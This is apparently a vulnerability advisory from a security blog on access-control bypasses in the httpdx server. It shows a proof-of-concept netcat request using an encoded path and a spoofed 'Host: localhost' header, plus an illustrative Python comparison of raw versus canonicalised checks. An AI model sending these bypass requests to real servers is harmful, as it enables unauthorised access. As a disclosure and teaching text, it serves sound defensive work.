Just Another Hacker

httpdx multiple access control bypass

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file. [ Taken from: http://sourceforge.net/projects/httpdx/ ]

Vulnerability description

Access control in httpdx is done with string-matching directives in the configuration file. Request variables are compared to static strings to determine whether access should be granted. Examples provided in the default configuration include:

    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
    }

And another example:

    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            realm="Stuff for admin only!"
        }
    }

As long as your request does not match these static strings but the path still resolves to the same files, you can access the content.

Additionally, as the server doesn't support traditional binding of virtual hosts to network interfaces, virtual-host-specific behaviour must be configured through similar string-matching directives:

    if<%HTTP_HOST% != "" && %HTTP_HOST% == {localhost,127.*.*.*}>{

The variable HTTP_HOST is set from the Host: header in the request, so in order to access the localhost virtual host remotely, just set your Host: header to localhost.
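Both weaknesses come down to comparing attacker-controlled strings instead of the thing the decision is really about. The following is an added example (not httpdx code) that contrasts the httpdx-style raw-string check with a check applied after the path has been canonicalised, and contrasts a Host-header rule with a decision based on the socket's peer address; the rules, request strings and addresses are constructed for illustration.

```python
from urllib.parse import unquote
import ipaddress
import posixpath

# Rules in the style of the httpdx config: a literal path prefix (the "*" dropped).
DENY_PREFIXES = ["/data/users.txt", "/admin.html"]

def raw_match_denied(request_uri: str) -> bool:
    """httpdx-style check: the raw REQUEST_URI string is compared to the rule."""
    return any(request_uri.startswith(p) for p in DENY_PREFIXES)

def canonical_path(request_uri: str, case_insensitive: bool = False) -> str:
    """Reduce a request URI to the path the file system will actually open:
    strip the query, percent-decode until stable (so %252f-style double
    encoding also resolves), collapse repeated slashes and '.'/'..' segments."""
    path = request_uri.split("?", 1)[0]
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    path = posixpath.normpath("/" + path.lstrip("/"))
    # Assumption: a case-insensitive file system (the advisory's server banner is
    # a Win32 build), where "/Admin.html" opens the same file as "/admin.html".
    return path.lower() if case_insensitive else path

def canonical_match_denied(request_uri: str, case_insensitive: bool = False) -> bool:
    """The same rules, applied to the canonical path instead of the raw string."""
    path = canonical_path(request_uri, case_insensitive)
    prefixes = [p.lower() for p in DENY_PREFIXES] if case_insensitive else DENY_PREFIXES
    return any(path.startswith(p) for p in prefixes)

def host_header_rule(host_header: str) -> bool:
    """httpdx-style virtual-host rule: %HTTP_HOST% == {localhost,127.*.*.*}.
    The Host header is chosen by the client, so this is not an access control."""
    host = host_header.split(":", 1)[0]
    return host == "localhost" or host.startswith("127.")

def peer_is_loopback(peer_ip: str) -> bool:
    """Decide 'local' from the socket's peer address, which the client cannot pick."""
    return ipaddress.ip_address(peer_ip).is_loopback

if __name__ == "__main__":
    # Constructed requests: only the first matches the raw rule; all reach the same file.
    for uri in ["/admin.html", "/%2fadmin.html", "/./admin.html", "/x/../admin.html"]:
        print(f"{uri:18} raw={raw_match_denied(uri)!s:5} canonical={canonical_match_denied(uri)}")
    print("Host: localhost from 203.0.113.9 ->",
          host_header_rule("localhost"), peer_is_loopback("203.0.113.9"))
```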

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: httpdx - http://sourceforge.net/projects/httpdx/
  • Affected versions: 1.5.5, 1.5.4 and probably earlier versions

Proof of Concept

The server comes with two examples of access control: a restricted file and a password-protected administrator area running on localhost. The following examples successfully access these restricted areas remotely:

Access user file:

user@~$ GET

Access admin console:

    user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 80
    HTTP/1.1 200 OK
    Date: Thu, 08 Nov 2012 03:25:58 GMT
    Content-Type: text/html
    Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
    Content-Length: 36
    Connection: close
    Server: httpdx/1.5.4 (Win32)
    Pragma: no-cache

Ok, you’re now at admin’s section.


The software appears to be abandoned, and the same versions suffer from remote code execution bugs. Use different software instead.

Disclosure time line

  • 12-Feb-2013 - Public disclosure
